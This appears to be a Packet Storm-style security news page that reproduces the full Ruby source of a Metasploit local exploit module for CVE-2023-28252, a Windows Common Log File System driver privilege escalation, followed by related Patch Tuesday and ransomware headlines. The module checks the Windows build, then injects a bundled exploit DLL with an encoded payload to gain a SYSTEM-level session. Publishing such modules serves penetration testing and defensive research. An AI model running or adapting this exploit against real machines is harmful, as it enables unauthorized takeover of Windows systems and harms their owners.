Security
Headlines
HeadlinesLatestCVEs

Headline

Windows Common Log File System Driver (clfs.sys) Privilege Escalation

A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems. This Metasploit module exploit makes use to two different kinds of specially crafted .blf files.

Packet Storm
#vulnerability#windows#git#auth
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = GoodRanking  include Msf::Exploit::Local::WindowsKernel  include Msf::Post::File  include Msf::Post::Windows::Priv  include Msf::Post::Windows::Process  include Msf::Post::Windows::ReflectiveDLLInjection  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Post::Windows::Version  def initialize(info = {})    super(      update_info(        info,        {          'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',          'Description' => %q{            A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on            Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.            The clfs.sys driver contains a function CreateLogFile that is used to create            open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which            contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a            .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with            WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.            This exploit makes use to two different kinds of specially crafted .blf files that are edited using the technique            mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of            bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe            that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially            crafted read the SYSTEM token and write it in the process of the exploit to achieve the local privilege escalation.            The exploits creates a controlled memory space by first looping over the CreatePipe function to            to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of            pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which when being opened fill the            0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.            This is a very brief and high overview description of what the exploit is actually doing. For a more detailed and in            depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).          },          'License' => MSF_LICENSE,          'Author' => [            'Ricardo Narvaja',    # Original PoC (@ricnar456)            'Esteban.kazimirow',  # Original PoC (@solidclt)            'jheysel-r7'          # msf module          ],          'Arch' => [ ARCH_X64 ],          'Platform' => 'win',          'SessionTypes' => [ 'meterpreter' ],          'DefaultOptions' => {            'EXITFUNC' => 'thread'          },          'Targets' => [            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]          ],          'References' => [            [ 'CVE', '2023-28252' ],            [ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]          ],          'DisclosureDate' => '2023-04-11',          'DefaultTarget' => 0,          'Privileged' => true,          'Notes' => {            'Stability' => [CRASH_SAFE],            'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed            'SideEffects' => []          },          'Compat' => {            'Meterpreter' => {              'Commands' => %w[                stdapi_railgun_api              ]            }          }        }      )    )  end  def check    unless session.platform == 'windows'      # Non-Windows systems are definitely not affected.      return Exploit::CheckCode::Safe    end    file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'    unless file?(file_path)      return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')    end    version = get_version_info    if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022      return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")    end    CheckCode::Safe  end  def exploit    if is_system?      fail_with(Failure::None, 'Session is already elevated')    end    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')    end    encoded_payload = payload.encoded    execute_dll(      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),      [encoded_payload.length].pack('I<') + encoded_payload    )    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  endend

Related news

VMware ESXi Flaw Exploited by Ransomware Groups for Admin Access

A recently patched security flaw impacting VMware ESXi hypervisors has been actively exploited by "several" ransomware groups to gain elevated permissions and deploy file-encrypting malware. The attacks involve the exploitation of CVE-2024-37085 (CVSS score: 6.8), an Active Directory integration authentication bypass that allows an attacker to obtain administrative access to the host. "A

Carbanak Banking Malware Resurfaces with New Ransomware Tactics

The banking malware known as Carbanak has been observed being used in ransomware attacks with updated tactics. "The malware has adapted to incorporate attack vendors and techniques to diversify its effectiveness," cybersecurity firm NCC Group said in an analysis of ransomware attacks that took place in November 2023. "Carbanak returned last month through new

Microsoft Patch Tuesday April 2023: CLFS EoP, Word RCE, MSMQ QueueJumper RCE, PCL6, DNS, DHCP

Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2023, including vulnerabilities that were added between February and March Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. I took the comments about the vulnerabilities from the Qualys, Tenable, Rapid7, ZDI Patch Tuesday reviews. And this is […]

Vulristics News: EPSS v3 Support, Integration into Cloud Advisor

Hello everyone! This episode and will be about latest news in my Vulristics project. EPSS v3 The third iteration of the Exploit Prediction Scoring System (EPSS) was released in March. It is stated that EPSS has become 82% better. There is a pretty cool and detailed article about the changes. For example, EPSS Team began to analyze not 16 parameters […]

Update now! April’s Patch Tuesday includes a fix for one zero-day

Categories: Exploits and vulnerabilities Categories: News Tags: Microsoft Tags: Apple Tags: Google Tags: Adobe Tags: Cisco Tags: SAP Tags: Mozilla Tags: CVE-2023-28252 Tags: CVE-2023-28231 Tags: CVE-2023-21554 Tags: Word Tags: Publisher Tags: Office One fixed vulnerability is being actively exploited by a ransomware gang and many others were fixed in this month's Patch Tuesday updates. (Read more...) The post Update now! April’s Patch Tuesday includes a fix for one zero-day appeared first on Malwarebytes Labs.

Urgent: Microsoft Issues Patches for 97 Flaws, Including Active Ransomware Exploit

It's the second Tuesday of the month, and Microsoft has released another set of security updates to fix a total of 97 flaws impacting its software, one of which has been actively exploited in ransomware attacks in the wild. Seven of the 97 bugs are rated Critical and 90 are rated Important in severity. Interestingly, 45 of the shortcomings are remote code execution flaws, followed by 20

Microsoft (& Apple) Patch Tuesday, April 2023 Edition

Microsoft today released software updates to plug 100 security holes in its Windows operating systems and other software, including a zero-day vulnerability that is already being used in active attacks. Not to be outdone, Apple has released a set of important updates addressing two zero-day vulnerabilities that are being used to attack iPhones, iPads and Macs.

Microsoft Patches 97 CVEs, Including Zero-Day & Wormable Bugs

The April 2023 Patch Tuesday security update also included a reissue of a fix for a 10-year-old bug that a threat actor recently exploited in the supply chain attack on 3CX.

CVE-2023-28252

Windows Common Log File System Driver Elevation of Privilege Vulnerability

Microsoft Patch Tuesday for April 2023 — Snort rules and prominent vulnerabilities

April is the third month in a row in which at least one of the vulnerabilities Microsoft released in a Patch Tuesday had been exploited in the wild prior to disclosure.

Packet Storm: Latest News

Ivanti EPM Agent Portal Command Execution